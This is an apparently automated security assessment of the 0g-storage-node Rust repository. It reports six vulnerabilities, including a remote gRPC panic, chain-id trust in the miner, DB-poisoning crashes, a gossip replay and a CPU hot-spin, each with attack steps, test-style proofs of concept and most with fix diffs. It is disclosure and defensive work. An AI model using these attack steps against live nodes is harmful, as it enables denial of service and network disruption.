KAI Security Assessment: 0g-storage-node
We ran KAI Agent against the 0g-storage-node repository. The automated analysis examined 47 exploit candidates across the Rust-based decentralized storage node implementation and verified 6 vulnerabilities, including 2 High and 2 Medium severity findings; fixes were generated and validated for 4 of them.
Executive Summary
| Metric | Value |
|---|---|
| Repository | 0g-storage-node |
| Exploit Candidates | 47 |
| Verified Exploits | 6 |
| Rejected | 4 |
Severity Breakdown
| Severity | Count |
|---|---|
| High | 2 |
| Medium | 2 |
| Unrated | 2 |
Verified Vulnerabilities
[HIGH] Remote gRPC Panic via Missing Proto Fields in SegmentWithProof
Severity: High
Affected File: node/rpc/src/types.rs
Affected Function: try_from in impl TryFrom<zgs_grpc_proto::SegmentWithProof> for SegmentWithProof
Description
The gRPC UploadSegmentsByTxSeq endpoint can be panicked remotely: the TryFrom conversion calls unwrap() on the optional SegmentWithProof.root and SegmentWithProof.proof fields, so a request that omits either field crashes the handler, enabling request-triggered DoS.
Attack Steps
- Connect to the node's gRPC listener (default 0.0.0.0:50051)
- Call ZgsGrpcService/UploadSegmentsByTxSeq with any tx_seq
- In the request, include at least one SegmentWithProof message where the 'root' field is omitted (so it decodes as None in Rust Option), and/or omit the 'proof' field
- Server-side, upload_segments_by_tx_seq converts each proto segment via SegmentWithProof::try_from(grpc_segment)
- The conversion executes grpc_segment.root.unwrap() and grpc_segment.proof.unwrap(), which panics when the field is missing
- Repeat malformed requests to repeatedly trigger panics (request-task DoS; process crash possible depending on panic handling/build settings)
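The failure mode above can be sketched in a few lines of Python. This is a simulation of the Rust behavior, not the real prost/tonic stack: prost decodes an omitted message-typed field as None, and Option::unwrap() on None panics. All names here are illustrative.

```python
# Simulation only: models prost decoding an omitted message field as None
# and Rust's Option::unwrap() panicking on None. Names are illustrative.
class UnwrapPanic(Exception):
    """Stands in for a Rust panic."""

def unwrap(opt):
    # Rust's Option::unwrap(): returns the value, or panics on None.
    if opt is None:
        raise UnwrapPanic("called `Option::unwrap()` on a `None` value")
    return opt

def try_from(grpc_segment: dict) -> dict:
    # Mirrors the vulnerable conversion: force-unwraps optional proto fields.
    root = unwrap(grpc_segment.get("root"))
    proof = unwrap(grpc_segment.get("proof"))
    return {"root": root, "proof": proof}

# A request that omits `root` takes the panic path.
try:
    try_from({"proof": b"\x01" * 32})  # `root` omitted -> decodes as None
    crashed = False
except UnwrapPanic:
    crashed = True
```

In the real server each panic kills at least the request task; the recommended fix below replaces the unwraps with ok_or_else so a missing field becomes an invalid-argument status instead.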
Proof of Concept
#!/usr/bin/env python3
import re
from pathlib import Path
import sys
ROOT = Path(__file__).resolve().parents[1]
types_path = ROOT / "node/rpc/src/types.rs"
impl_path = ROOT / "node/rpc/src/zgs_grpc/impl.rs"
types_src = types_path.read_text(encoding="utf-8")
impl_src = impl_path.read_text(encoding="utf-8")
def must_find(pattern: str, text: str, label: str):
    m = re.search(pattern, text, flags=re.MULTILINE)
    if not m:
        print(f"[FAIL] did not find {label} / pattern: {pattern}")
        sys.exit(1)
    return m.group(0)
# Primary vulnerable unwraps
hit_root = must_find(r"grpc_segment\.root\.unwrap\(\)", types_src, "grpc_segment.root.unwrap()")
hit_proof = must_find(r"grpc_segment\.proof\.unwrap\(\)", types_src, "grpc_segment.proof.unwrap()")
# Confirm the unwraps are within the expected TryFrom impl for SegmentWithProof
hit_impl_header = must_find(
r"impl\s+TryFrom<zgs_grpc_proto::SegmentWithProof>\s+for\s+SegmentWithProof\s*{",
types_src,
"TryFrom<proto::SegmentWithProof> for SegmentWithProof header",
)
# Affected handler calls try_from and does not catch panics
hit_handler = must_find(
r"async\s+fn\s+upload_segments_by_tx_seq\s*\(",
impl_src,
"upload_segments_by_tx_seq method signature",
)
hit_call = must_find(
r"RpcSegment::try_from\(s\)",
impl_src,
"RpcSegment::try_from(s) call in handler",
)
# Heuristic: ensure there's no catch_unwind in handler file
if "catch_unwind" in impl_src:
    print("[WARN] found catch_unwind in impl.rs; manual review needed")
    sys.exit(2)
print("[OK] Confirmed unwrap() on optional proto fields in SegmentWithProof::try_from:")
print(" ", hit_root.strip())
print(" ", hit_proof.strip())
print("[OK] Confirmed UploadSegmentsByTxSeq handler calls RpcSegment::try_from(s) without panic catching.")
print(" ", hit_call.strip())
print()
print("Impact: A gRPC client can omit `SegmentWithProof.root` and/or `SegmentWithProof.proof` in")
print("UploadSegmentsByTxSeqRequest.segments; prost decodes omitted message fields as None;")
print("the unwrap() will panic, causing request-triggered DoS (task panic / possible process crash).")
Recommended Fix
diff --git a/node/rpc/src/types.rs b/node/rpc/src/types.rs
index b072cc0..c619dab 100644
--- a/node/rpc/src/types.rs
+++ b/node/rpc/src/types.rs
@@ -129,13 +129,16 @@ impl TryFrom<zgs_grpc_proto::SegmentWithProof> for SegmentWithProof {
type Error = GrpcStatus;
fn try_from(grpc_segment: zgs_grpc_proto::SegmentWithProof) -> Result<Self, GrpcStatus> {
- let root = grpc_segment.root.unwrap().try_into()?;
+ let root = grpc_segment
+ .root
+ .ok_or_else(|| GrpcStatus::invalid_argument("missing field: root"))?
+ .try_into()?;
let data = grpc_segment.data;
// index is u64 in proto, usize in app
let index = grpc_segment.index.try_into().map_err(|_| {
GrpcStatus::invalid_argument(format!("Invalid segment index: {}", grpc_segment.index))
})?;
- let proof = grpc_segment.proof.unwrap().try_into()?;
+ let proof = grpc_segment
+ .proof
+ .ok_or_else(|| GrpcStatus::invalid_argument("missing field: proof"))?
+ .try_into()?;
[HIGH] Chain ID Truncation Enables Wrong-Chain Signing via Malicious RPC
Severity: High
Affected File: node/miner/src/config.rs
Affected Function: make_signing_provider
Description
The miner signs transactions with a chain_id taken from the RPC response and cast from U256 to u64 via as_u64, so a malicious or MITM RPC endpoint can force wrong-chain signing (persistent submission failures, or wasted gas on an unintended network).
Attack Steps
- Attacker controls victim miner's JSON-RPC endpoint or performs MITM attack (especially over http://)
- Attacker answers eth_chainId with an unexpected value (e.g., a different chain's id, or a value above u64::MAX, which makes as_u64() panic)
- Miner constructs LocalWallet with with_chain_id(chain_id.as_u64())
- All submissions are signed for the attacker-chosen chain-id domain, causing invalid signatures/rejected txs on the intended chain, or transactions being broadcast to/paid on an unintended chain served by the attacker RPC
- Miner continuously retries/submits and loses liveness (and possibly funds via fees on the wrong network)
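The trust problem can be sketched in Python (a stand-in for ethers' U256::as_u64, which, per the PoC below, panics when the value exceeds u64::MAX; function names are illustrative):

```python
U64_MAX = 2**64 - 1

def as_u64(chain_id: int) -> int:
    # Stand-in for ethers' U256::as_u64: panics (here, raises) on overflow.
    if chain_id > U64_MAX:
        raise OverflowError("integer overflow when casting U256 to u64")
    return chain_id

def make_signer_chain_id(rpc_reported_chain_id: int) -> int:
    # The miner trusts whatever eth_chainId returns and casts it blindly,
    # with no comparison against an expected/configured chain id.
    return as_u64(rpc_reported_chain_id)

# Malicious RPC reports a different chain: the signer is bound to it unchecked.
wrong_chain = make_signer_chain_id(42)

# Malicious RPC reports a value above u64::MAX: miner init crashes.
try:
    make_signer_chain_id(2**64 + 1)
    crashed = False
except OverflowError:
    crashed = True
```

A robust fix would pin the expected chain id in config and reject any mismatching eth_chainId response, rather than only guarding the u64 cast.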
Proof of Concept
// Standalone PoC crate: includes the vulnerable MinerConfig implementation verbatim,
// but provides minimal stand-ins for `storage::config::ShardConfig` and `contract_wrapper::SubmitConfig`
// so we don't need to compile the full workspace (which pulls rocksdb/bindgen).
pub mod storage {
pub mod config {
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub struct ShardConfig {
pub shard_id: usize,
pub num_shard: usize,
}
impl Default for ShardConfig {
fn default() -> Self {
Self {
shard_id: 0,
num_shard: 1,
}
}
}
}
}
pub mod contract_wrapper {
#[derive(Clone, Copy, Debug)]
pub struct SubmitConfig {
pub initial_gas_price: Option<u64>,
pub max_gas_price: Option<u64>,
pub max_gas: Option<u64>,
pub gas_increase_factor: Option<u64>,
pub max_retries: Option<usize>,
pub interval_secs: Option<u64>,
}
impl Default for SubmitConfig {
fn default() -> Self {
Self {
initial_gas_price: None,
max_gas_price: None,
max_gas: None,
gas_increase_factor: Some(11),
max_retries: Some(5),
interval_secs: Some(2),
}
}
}
}
// Pull in the vulnerable implementation exactly as-shipped.
include!("../../../node/miner/src/config.rs");
#[cfg(test)]
mod poc_tests {
use super::*;
use std::io::{Read, Write};
use std::net::{TcpListener, TcpStream};
use std::thread;
use std::time::Duration;
/// Minimal HTTP JSON-RPC server that responds only to `eth_chainId`.
/// It returns the attacker-controlled chain id specified.
fn start_mock_rpc(chain_id_hex: &'static str) -> String {
let listener = TcpListener::bind("127.0.0.1:0").expect("bind");
let addr = listener.local_addr().expect("local_addr");
thread::spawn(move || {
for stream in listener.incoming().take(10) {
if let Ok(stream) = stream {
let _ = handle_conn(stream, chain_id_hex);
}
}
});
format!("http://{}", addr)
}
fn handle_conn(mut stream: TcpStream, chain_id_hex: &str) -> Result<(), String> {
stream
.set_read_timeout(Some(Duration::from_millis(500)))
.map_err(|e| format!("set_read_timeout: {e:?}"))?;
// Read request (best-effort).
let mut buf = Vec::with_capacity(8192);
let mut tmp = [0u8; 4096];
loop {
match stream.read(&mut tmp) {
Ok(0) => break,
Ok(n) => {
buf.extend_from_slice(&tmp[..n]);
if buf.windows(4).any(|w| w == b"\r\n\r\n") && buf.len() > 16 {
break;
}
}
Err(_) => break,
}
}
let req = String::from_utf8_lossy(&buf);
// Extract numeric JSON-RPC id if present (ethers uses numeric ids).
let id = extract_jsonrpc_id(&req).unwrap_or_else(|| "1".to_string());
let body = format!(r#"{{"jsonrpc":"2.0","id":{},"result":"{}"}}"#, id, chain_id_hex);
let resp = format!(
"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{}",
body.len(),
body
);
stream
.write_all(resp.as_bytes())
.map_err(|e| format!("write: {e:?}"))?;
Ok(())
}
fn extract_jsonrpc_id(req: &str) -> Option<String> {
let idx = req.find("\"id\"")?;
let after = &req[idx..];
let colon = after.find(':')?;
let mut chars = after[colon + 1..].trim_start().chars();
let mut out = String::new();
for c in &mut chars {
if c.is_ascii_digit() {
out.push(c);
} else {
break;
}
}
if out.is_empty() {
None
} else {
Some(out)
}
}
#[tokio::test]
async fn attacker_controls_wallet_chain_id() {
// Attacker lies about chain-id to force wrong-chain signing domain.
let rpc_url = start_mock_rpc("0x2a"); // 42
let cfg = MinerConfig::new(
None,
Some(H256::from_low_u64_be(1)), // valid secp256k1 secret key (non-zero)
rpc_url,
Address::zero(),
Address::zero(),
0,
1,
1,
ShardConfig::default(),
0,
0,
0,
SubmitConfig::default(),
)
.expect("MinerConfig::new");
let middleware = cfg.make_signing_provider().await.expect("make_signing_provider");
assert_eq!(middleware.signer().chain_id(), 42);
}
#[tokio::test]
async fn overflow_chain_id_panics() {
// On this dependency set, U256::as_u64 panics on overflow.
// Attacker-controlled RPC can crash miner init by returning a >u64 chain id.
let rpc_url = start_mock_rpc("0x10000000000000001"); // 2^64 + 1
let cfg = MinerConfig::new(
None,
Some(H256::from_low_u64_be(1)),
rpc_url,
Address::zero(),
Address::zero(),
0,
1,
1,
ShardConfig::default(),
0,
0,
0,
SubmitConfig::default(),
)
.expect("MinerConfig::new");
let jh = tokio::spawn(async move {
// This should panic inside make_signing_provider when calling chain_id.as_u64().
let _ = cfg.make_signing_provider().await;
});
let join_res = jh.await;
assert!(join_res.is_err(), "task should fail (panic expected)");
assert!(join_res.unwrap_err().is_panic(), "failure should be a panic");
}
}
Recommended Fix
--- a/node/miner/src/config.rs
+++ b/node/miner/src/config.rs
@@ -90,7 +90,12 @@
.map_err(|e| format!("Unable to get chain_id: {:?}", e))?;
let secret_key = SecretKey::from_bytes(self.miner_key.as_ref().into())
.map_err(|e| format!("Cannot parse private key: {:?}", e))?;
- let signer = LocalWallet::from(secret_key).with_chain_id(chain_id.as_u64());
+ let chain_id_u64 = if chain_id > ethers::types::U256::from(u64::MAX) {
+ return Err(format!("chain_id {:?} does not fit into u64", chain_id));
+ } else {
+ chain_id.as_u64()
+ };
+ let signer = LocalWallet::from(secret_key).with_chain_id(chain_id_u64);
let middleware = SignerMiddleware::new(provider, signer);
Ok(middleware)
[MEDIUM] Persistent Crash Loop from Malformed Merkle Node Bytes in FlowStore
Severity: Medium
Affected File: node/storage/src/log_store/flow_store.rs
Affected Function: FlowDBStore::get_node
Description
FlowStore panics on malformed merkle-node bytes read from the DB because it uses try_into().unwrap() and OptionalHash::from_bytes(...).unwrap(), enabling a persistent crash loop if the DB column is poisoned (e.g., via snapshot import or corruption).
Attack Steps
- Provide or cause the node to load a poisoned DB/snapshot containing invalid values in the COL_FLOW_MPT_NODES column (wrong length or invalid OptionalHash encoding)
- Trigger any code path that calls FlowDBStore::get_node for the poisoned key (normal merkle operations)
- The read path executes v.as_slice().try_into().unwrap() or OptionalHash::from_bytes(...).unwrap(), panics, and the node crashes repeatedly on restart
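Assuming the 33-byte encoding exercised by the PoC below (one flag byte that must be 0 or 1, followed by a 32-byte hash), a Python sketch of a tolerant decoder shows both malformed shapes being reported as errors instead of panicking:

```python
# Illustrative decoder for the assumed OptionalHash encoding:
# byte 0 is a flag (0 = None, 1 = Some), bytes 1..33 are the hash.
def optional_hash_from_bytes(b: bytes):
    """Return (value, error); error is None on success."""
    if len(b) != 33:
        return None, f"expected 33 bytes, got {len(b)}"
    flag = b[0]
    if flag == 0:
        return ("none",), None
    if flag == 1:
        return ("some", b[1:]), None
    return None, f"invalid flag byte {flag}"

# The two poisoned values used by the tests below:
_, err_short = optional_hash_from_bytes(b"too_short")            # wrong length
_, err_flag = optional_hash_from_bytes(bytes([2]) + bytes(32))   # bad flag
```

This mirrors the recommended fix: surface a decode error (and log it) rather than unwrap, so one poisoned row cannot create a restart crash loop.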
Proof of Concept
// --- PoC: FlowDBStore::get_node panics on malformed bytes in COL_FLOW_MPT_NODES ---
// This demonstrates a persistent crash loop risk if the DB/snapshot is poisoned with invalid bytes.
use super::flow_store::FlowDBStore;
use crate::log_store::log_manager::{COL_FLOW_MPT_NODES, COL_NUM};
use crate::ZgsKeyValueDB;
use append_merkle::NodeDatabase;
use kvdb_memorydb;
use std::panic::{catch_unwind, AssertUnwindSafe};
use std::sync::Arc;
fn encode_mpt_node_key_test(layer_index: usize, position: usize) -> Vec<u8> {
let mut key = layer_index.to_be_bytes().to_vec();
key.extend_from_slice(&position.to_be_bytes());
key
}
#[test]
fn poc_flowstore_get_node_panics_on_short_value() {
// Arrange: create in-memory kvdb and poison the COL_FLOW_MPT_NODES value with wrong length.
let db = Arc::new(kvdb_memorydb::create(COL_NUM));
let store = FlowDBStore::new(db.clone());
let key = encode_mpt_node_key_test(1, 2);
db.put(COL_FLOW_MPT_NODES, &key, b"too_short")
.expect("db put should succeed");
// Act + Assert: get_node panics due to `try_into().unwrap()` on a non-33-byte slice.
let panicked = catch_unwind(AssertUnwindSafe(|| {
let _ = store.get_node(1, 2);
}))
.is_err();
assert!(panicked, "expected get_node to panic on short DB value");
}
#[test]
fn poc_flowstore_get_node_panics_on_invalid_optionalhash_flag() {
// Arrange: poison DB with correct length (33) but invalid OptionalHash flag byte.
let db = Arc::new(kvdb_memorydb::create(COL_NUM));
let store = FlowDBStore::new(db.clone());
let key = encode_mpt_node_key_test(3, 4);
let mut v = [0u8; 33];
v[0] = 2; // invalid flag (must be 0 or 1 per OptionalHash::from_bytes)
db.put(COL_FLOW_MPT_NODES, &key, &v[..])
.expect("db put should succeed");
// Act + Assert: get_node panics due to `OptionalHash::from_bytes(...).unwrap()`.
let panicked = catch_unwind(AssertUnwindSafe(|| {
let _ = store.get_node(3, 4);
}))
.is_err();
assert!(panicked, "expected get_node to panic on invalid OptionalHash encoding");
}
Recommended Fix
--- a/node/storage/src/log_store/flow_store.rs
+++ b/node/storage/src/log_store/flow_store.rs
@@ -598,10 +598,33 @@
impl NodeDatabase<OptionalHash> for FlowDBStore {
fn get_node(&self, layer: usize, pos: usize) -> Result<Option<OptionalHash>> {
- Ok(self
+ let raw = self
.kvdb
- .get(COL_FLOW_MPT_NODES, &encode_mpt_node_key(layer, pos))?
- .map(|v| OptionalHash::from_bytes(v.as_slice().try_into().unwrap()).unwrap()))
+ .get(COL_FLOW_MPT_NODES, &encode_mpt_node_key(layer, pos))?;
+ let Some(v) = raw else {
+ return Ok(None);
+ };
+
+ let bytes: &[u8; 33] = match v.as_slice().try_into() {
+ Ok(b) => b,
+ Err(_) => {
+ error!(
+ layer,
+ pos,
+ len = v.len(),
+ "invalid merkle node byte length in DB (expected 33)"
+ );
+ return Ok(None);
+ }
+ };
+
+ match OptionalHash::from_bytes(bytes) {
+ Ok(node) => Ok(Some(node)),
+ Err(e) => {
+ error!(layer, pos, err = %e, "invalid merkle node bytes in DB");
+ Ok(None)
+ }
+ }
}
fn get_layer_size(&self, layer: usize) -> Result<Option<usize>> {
[MEDIUM] AnnounceFile Replay Attack via Unsigned resend_timestamp
Severity: Medium
Affected File: node/router/src/libp2p_event_handler.rs
Affected Function: construct_announce_file_message + on_announce_file
Description
AnnounceFile freshness is checked against resend_timestamp (apparently not covered by the signature) instead of the signed inner timestamp, allowing indefinite replay of stale-but-once-valid announcements (cache poisoning / routing degradation).
Attack Steps
- Attacker can observe any valid SignedAnnounceFile on pubsub (or otherwise obtain one) and can republish gossipsub messages
- Attacker records a valid SignedAnnounceFile that would normally age out
- After it becomes stale, attacker republishes the same signed payload but sets resend_timestamp = now() (the code sets signed.resend_timestamp = timestamp after signing, implying it is mutable and not signature-protected)
- Victim verifies the signature on the signed portion and checks freshness using msg.resend_timestamp, so the replay passes the timeout window
- Victim accepts and inserts it into file_location_cache, keeping stale locations alive and repeatedly steering lookups/connection attempts toward attacker-chosen or dead endpoints
- Attacker repeats to keep poisoned entries perpetually 'fresh' across the network
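The signed-vs-unsigned field split can be sketched with HMAC in Python (illustrative; the real messages use libp2p keypairs, not a shared key): the signature covers the inner payload and its timestamp, while resend_timestamp sits outside the signed bytes, so bumping it does not invalidate the signature.

```python
import hashlib
import hmac
import json

KEY = b"announcer-key"  # illustrative; real messages use libp2p keypairs

def _signed_bytes(inner: dict, timestamp: int) -> bytes:
    return json.dumps({"inner": inner, "timestamp": timestamp}, sort_keys=True).encode()

def sign_announce(inner: dict, timestamp: int) -> dict:
    sig = hmac.new(KEY, _signed_bytes(inner, timestamp), hashlib.sha256).hexdigest()
    # resend_timestamp is set *after* signing -> not covered by the signature.
    return {"inner": inner, "timestamp": timestamp,
            "resend_timestamp": timestamp, "signature": sig}

def verify_and_check_freshness(msg: dict, now: int, timeout: int) -> bool:
    expected = hmac.new(KEY, _signed_bytes(msg["inner"], msg["timestamp"]),
                        hashlib.sha256).hexdigest()
    sig_ok = hmac.compare_digest(msg["signature"], expected)
    # Vulnerable freshness check: uses the unsigned resend_timestamp.
    fresh = now - msg["resend_timestamp"] <= timeout
    return sig_ok and fresh

now = 1_000_000
msg = sign_announce({"tx": 4242}, timestamp=now - 10_000)      # long stale
stale_rejected = not verify_and_check_freshness(msg, now, 300)  # stale: ignored
msg["resend_timestamp"] = now                                   # attacker bumps unsigned field
replay_accepted = verify_and_check_freshness(msg, now, 300)     # signature still valid
```

The recommended fix checks freshness against the signed inner timestamp, which the attacker cannot change without breaking the signature.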
Proof of Concept
#[tokio::test]
async fn test_on_pubsub_announce_file_replay_by_bumping_resend_timestamp() {
let mut ctx = Context::default();
let handler = ctx.new_handler();
let (alice, bob) = (PeerId::random(), PeerId::random());
let id = MessageId::new(b"dummy message");
let tx = TxID::random_hash(4242);
// Create an announcement with an *old* inner timestamp that should be stale.
let old_timestamp =
timestamp_now() - PUBSUB_TIMEOUT_NETWORK.num_seconds() as u32 - 100;
let peer_id = *ctx.network_globals.peer_id.read();
let addr = ctx
.network_globals
.listen_multiaddrs
.read()
.first()
.unwrap()
.clone();
let timed = TimedMessage {
inner: network::types::AnnounceFile {
tx_ids: vec![tx],
shard_config: handler.store.get_store().get_shard_config().into(),
peer_id: peer_id.into(),
at: addr.into(),
},
timestamp: old_timestamp,
};
// Sign message (signature covers `timed`, i.e., the inner timestamp), but NOT resend_timestamp.
let mut signed = network::types::SignedMessage::sign_message(timed, &ctx.keypair).unwrap();
// Case 1: stale resend_timestamp => ignored.
signed.resend_timestamp = old_timestamp;
let message = PubsubMessage::AnnounceFile(vec![signed.clone()]);
let res = handler.on_pubsub_message(alice, bob, &id, message).await;
assert!(matches!(res, MessageAcceptance::Ignore));
assert_eq!(ctx.file_location_cache.get_all(tx).len(), 0);
assert!(matches!(ctx.sync_recv.try_recv(), Err(TryRecvError::Empty)));
// Case 2: replay exact same signed payload, only bump resend_timestamp => accepted.
signed.resend_timestamp = timestamp_now();
let message = PubsubMessage::AnnounceFile(vec![signed]);
let res = handler.on_pubsub_message(alice, bob, &id, message).await;
// This demonstrates the vulnerability: stale message becomes acceptable by changing only resend_timestamp.
assert!(matches!(res, MessageAcceptance::Accept));
// ensure notify to sync layer
match ctx.sync_recv.try_recv() {
Ok(Notification(SyncMessage::AnnounceFileGossip { tx_id, peer_id: got_peer_id, addr: got_addr })) => {
assert_eq!(tx_id, tx);
assert_eq!(got_peer_id, peer_id);
assert_eq!(got_addr, *ctx.network_globals.listen_multiaddrs.read().first().unwrap());
}
Ok(_) => panic!("Unexpected sync message type received"),
Err(e) => panic!("No sync message received: {:?}", e),
}
// ensure cache updated
assert_eq!(ctx.file_location_cache.get_all(tx).len(), 1);
}
Recommended Fix
diff --git a/tmp/orig_snap/libp2p_event_handler.rs b/node/router/src/libp2p_event_handler.rs
index 1d6bcd1..85dcb8b 100644
--- a/tmp/orig_snap/libp2p_event_handler.rs
+++ b/node/router/src/libp2p_event_handler.rs
@@ -806,6 +806,20 @@ impl Libp2pEventHandler {
Err(_) => return MessageAcceptance::Reject,
};
+ // verify signed timestamp (prevents replay-by-bumping resend_timestamp)
+ let signed_d = duration_since(
+ msg.inner.timestamp,
+ metrics::LIBP2P_HANDLE_PUBSUB_ANNOUNCE_FILE_LATENCY.clone(),
+ );
+ if signed_d < TOLERABLE_DRIFT.neg() || signed_d > *PUBSUB_TIMEOUT_NETWORK {
+ debug!(
+ ?signed_d,
+ %propagation_source,
+ "Invalid signed timestamp, ignoring AnnounceFile message"
+ );
+ metrics::LIBP2P_HANDLE_PUBSUB_ANNOUNCE_FILE_TIMEOUT.mark(1);
+ return MessageAcceptance::Ignore;
+ }
// propagate gossip to peers
let d = duration_since(
msg.resend_timestamp,
[UNRATED] Sealer Main Loop CPU Hot-Spin
Severity: Unrated
Affected File: node/miner/src/sealer.rs
Affected Function: start loop + seal_iteration
Description
The sealer's main loop can hot-spin at 100% CPU when seal_iteration() returns Ok(true), because the throttle is never reset in that branch, enabling a sustained, locally or remotely influenced DoS.
Attack Steps
- Victim runs the miner sealer; attacker can (directly or indirectly) influence the task source backing self.store.pull_seal_chunk(...) (e.g., via whatever network-to-store ingestion exists) and/or can influence RPC/context readiness so fetch_context() often returns Ok(None) quickly
- Attacker causes the victim store to continuously report a non-empty set of seal tasks (so seal_iteration() does not take the Ok(false) path that resets the throttle)
- Attacker simultaneously causes each task to be non-sealable (e.g., the context is 'not ready', so fetch_context(seal_index) returns Ok(None)), making the loop continue for each task without producing work
- seal_iteration() still returns Ok(true) (tasks existed), even if answers is empty
- In the start loop, the Ok(true) branch does not reset db_checker_throttle, so db_checker_throttle.is_elapsed() remains true
- The outer loop immediately runs another iteration with no sleep/backoff, producing a tight loop that burns CPU (and can also cause repeated DB/RPC access depending on the skipped path)
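The loop shape can be modeled in a few lines of Python (illustrative; the real loop uses a tokio Sleep-based throttle): when the Ok(true) branch never re-arms the throttle, the loop re-enters immediately instead of backing off.

```python
import time

def run_loop(seal_iteration, duration_s=0.05):
    """Model of the sealer's start() loop; returns iteration count."""
    iterations = 0
    throttle_elapsed = True  # db_checker_throttle starts elapsed
    deadline = time.monotonic() + duration_s
    while time.monotonic() < deadline:
        if throttle_elapsed:
            had_tasks = seal_iteration()
            iterations += 1
            if not had_tasks:
                # Ok(false) branch: throttle is re-armed (modeled as a one-shot
                # here; the real code waits for a timer before re-eleapsing).
                throttle_elapsed = False
            # BUG modeled: Ok(true) branch leaves the throttle elapsed,
            # so the next pass re-enters seal_iteration() immediately.
    return iterations

spins = run_loop(lambda: True)   # tasks always exist, no answers: hot spin
idle = run_loop(lambda: False)   # no tasks: one iteration, then throttled
```

Resetting the throttle in the Ok(true) branch as well (or sleeping between iterations) bounds the iteration rate regardless of what the store reports.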
Proof of Concept
/// PoC unit test (add to bottom of `node/miner/src/sealer.rs`)
///
/// Confirms hot-spin: if `seal_iteration()` keeps returning Ok(true) (tasks exist) but produces no
/// answers (context not ready => fetch_context returns Ok(None)), the `start()` loop never resets
/// db_checker_throttle in the Ok(true) branch and will re-run sealing iterations as fast as possible.
#[cfg(test)]
mod hot_spin_tests {
use super::*;
use std::str::FromStr;
use std::sync::{atomic::{AtomicUsize, Ordering}, Arc};
use append_merkle::OptionalHash;
use ethers::prelude::{Http, Provider, RetryClient, RetryClientBuilder};
use ethers::providers::HttpRateLimitRetryPolicy;
use ethers::types::Address;
use shared_types::{
Chunk, ChunkArray, ChunkArrayWithProof, ChunkWithProof, DataRoot, FlowRangeProof,
Transaction,
};
use storage::config::ShardConfig;
use storage::error::Result;
use storage::log_store::config::{ConfigTx, Configurable};
use storage::log_store::load_chunk::EntryBatch;
use storage::log_store::tx_store::{BlockHashAndSubmissionIndex, TxStatus};
use storage::log_store::{LogStoreChunkRead, LogStoreChunkWrite, LogStoreRead, LogStoreWrite, MineLoadChunk, SealAnswer, SealTask};
/// Dummy synchronous store used underneath `storage_async::Store`.
///
/// Behavior:
/// - `pull_seal_chunk(..)` always returns a non-empty task list.
/// - `submit_seal_result(..)` is a no-op.
///
/// This forces `seal_iteration()` to return Ok(true) every time while `fetch_context()` will
/// return Ok(None) quickly (because Sealer.last_context_flow_length = 0), creating empty answers.
#[derive(Default)]
struct DummyLogStore {
pull_calls: AtomicUsize,
submit_calls: AtomicUsize,
shard_config: ShardConfig,
}
#[test]
fn sealer_start_loop_hot_spins_when_seal_iteration_ok_true() {
// Use the task_executor crate's built-in test runtime wrapper.
let tr = task_executor::test_utils::TestRuntime::default();
let dummy: Arc<DummyLogStore> = Arc::new(DummyLogStore::default());
let dummy_for_assert = dummy.clone();
// Run everything inside the TestRuntime's tokio runtime.
tr.runtime.block_on(async move {
// storage_async::Store wraps the synchronous log-store and uses TaskExecutor to offload work.
let log_store: Arc<dyn storage::log_store::Store> = dummy.clone();
let store = Arc::new(storage_async::Store::new(log_store, tr.task_executor.clone()));
// Provider that will fail quickly; we keep last_context_flow_length=0 so fetch_context short-circuits
// and does not hit the network in seal_iteration().
let http = Http::from_str("http://127.0.0.1:1").expect("valid URL");
let provider: Arc<Provider<RetryClient<Http>>> = Arc::new(Provider::new(
RetryClientBuilder::default()
.rate_limit_retries(0)
.timeout_retries(0)
.initial_backoff(Duration::from_millis(0))
.build(http, Box::new(HttpRateLimitRetryPolicy)),
));
let flow_contract = ZgsFlow::new(Address::zero(), provider);
let sealer = Sealer {
flow_contract,
store,
context_cache: Default::default(),
last_context_flow_length: 0,
miner_id: H256::zero(),
};
let handle = tokio::spawn(async move {
sealer.start().await;
});
// Let it run briefly.
tokio::time::sleep(Duration::from_millis(200)).await;
handle.abort();
// If db_checker_throttle were reset on Ok(true), we'd see ~0-1 pulls in 200ms.
// Because it is *not* reset, it hot-spins and we observe many pulls.
let pulls = dummy_for_assert.pull_count();
assert!(pulls > 20, "expected hot spin (many pull_seal_chunk calls); got pulls={pulls}");
});
}
}
Recommended Fix
No suggested diff provided for this vulnerability.
[UNRATED] Sync Manager Panic on Shutdown Channel Error
Severity: Unrated
Affected File: node/log_entry_sync/src/sync_manager/mod.rs
Affected Function: spawn (run_and_log error callback)
Description
The sync manager's error-handling path panics because it calls shutdown_sender.try_send(...).expect("shutdown send error") on a possibly closed or full channel, turning a recoverable provider-induced failure into a crash.
Attack Steps
- Induce a log-sync failure by making the configured provider return errors/timeouts for required calls (e.g., eth_getLogs / eth_getBlockByNumber)
- Ensure the shutdown receiver is dropped or the bounded shutdown channel is full (e.g., a concurrent shutdown is already in progress, or failures repeat)
- When the error callback runs, try_send returns Err and .expect("shutdown send error") panics, crashing the sync task/process
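A Python analogue of the failing path (queue.Queue stands in for the bounded futures mpsc channel; names are illustrative): try_send on a full or closed channel returns an error, and .expect(...) converts that recoverable error into a crash.

```python
import queue

class Panic(Exception):
    """Stands in for a Rust panic raised by .expect(...)."""

def expect(fn, msg):
    # Rust's Result::expect: return the success value, panic with `msg` on error.
    try:
        return fn()
    except Exception as e:
        raise Panic(f"{msg}: {e!r}")

shutdown = queue.Queue(maxsize=1)
shutdown.put_nowait("already shutting down")  # bounded channel is already full

try:
    # The error callback: try_send (put_nowait) fails, expect turns it into a panic.
    expect(lambda: shutdown.put_nowait("log sync failure"), "shutdown send error")
    panicked = False
except Panic:
    panicked = True
```

Logging the failed send and continuing (or at most returning an error) keeps a provider outage from escalating into a process crash.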
Proof of Concept
// poc_shutdown_expect/Cargo.toml
[package]
name = "poc_shutdown_expect"
version = "0.1.0"
edition = "2021"
[dependencies]
anyhow = "1"
futures = "0.3"
tokio = { version = "1", features = ["macros", "rt"] }
task_executor = { path = "../common/task_executor" }
[workspace]
// poc_shutdown_expect/src/lib.rs
use std::fmt::Debug;
use std::future::Future;
/// Copy of the `run_and_log` helper from:
/// node/log_entry_sync/src/sync_manager/mod.rs
async fn run_and_log<R, E>(
mut on_error: impl FnMut(),
f: impl Future<Output = std::result::Result<R, E>> + Send,
) -> Option<R>
where
E: Debug,
{
match f.await {
Err(_e) => {
// In production this logs and then runs the error callback.
on_error();
None
}
Ok(r) => Some(r),
}
}
